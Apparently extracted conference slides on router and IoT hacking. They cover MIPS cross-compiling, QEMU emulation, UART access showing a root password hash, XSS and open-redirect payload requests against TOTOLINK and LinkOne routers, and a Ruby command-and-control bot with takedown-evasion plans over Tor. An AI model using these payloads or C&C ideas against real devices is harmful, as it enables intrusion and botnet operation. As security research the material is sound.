    # man crosscompiling |grep mips * gcc-mips-linux-gnu * -static option (Will increase size) * strip * Tks Rafael Machado ;) root@debian-mips:~# ls -lhsa 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste root@debian-mips:~# strip teste 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste
  • 14.
    # man qemu|grep mips * https://www.linux-mips.org/wiki/MIPS_Malta * Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/ qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22 root@172.16.68.128's password: Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips Last login: Fri Nov 25 17:19:33 2016 root@debian-mips:~# root@debian-mips:~# uname -a Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux
  • 15.
    # cd busybox&& make menuconfig
  • 16.
    # man UART TP-LinkTL-WR841ND - 2 detachable antennas - 4 Port 100/10 Switch - 1 Port 100/10 Wan Interface - 4 MB Flash - 32 MB Ram - WPS Button - Wi-Fi On/Off Button * Tks Osvaldo! ;)
  • 17.
    # man UART *Find RX/TX/GND/VCC * VCC 3v3 * GND 0,0 * TX about 3v * Velocity 115200 cat /etc/shadow root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
  • 18.
    # cat bugs.txt *looking for bugs: - Web applications (XSS,CSRF,LFI,RCE,etc...) - Memory Corruptions - Hardcoded passwords and Default credentials - Backdoors - Information disclosures
  • 19.
    # cat totolink_payload.txt POST/login.cgi HTTP/1.1 Host: 192.168.1.1 Referer: http://192.168.1.1/login.htm Cookie: SessionID= username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte %22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send
  • 20.
    # cat linkOne_payloads.txt GET/goform/SafeWanWebMan? GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0" %3balert(1)%2f%2f HTTP/1.1 Host: 192.168.0.1 Cookie: language=en; admin:language=en Connection: keep-alive POST /goform/SysStatusHandle HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Referer: http://192.168.0.1/system_status.asp Cookie: language=en; admin:language=en CMD=WAN_CON&GO=system_status.asp&action=;alert(1) ;
  • 21.
    # cat linkOne_payloads2.txt OpenRedirect -------------- GET /goform/SysStatusHandle? CMD=&GO=http://www.evil.com.br&action= HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Cookie: language=en; admin:language=en Connection: close
  • 22.
    # man cec *Command and Control * Ruby * Client and Server (cec.rb and bn.rb) * HTTP * No frameworks(cgi)
  • 23.
    # man cec -C&C C&C client bot.sh comands 5s 5s 5s
  • 24.
  • 25.
    # cat next_steps.txt *Fix bugs * Code refactor * More features * Criptography * Clients to ARM / MIPS / etc... * TakeDown Evasion
  • 26.
    # man tor2web *https://www.tor2web.org/ “Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser” * replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct Anonymity for the server • eqt5g4fuenphqinx.onion • End-to-end encryption
  • 27.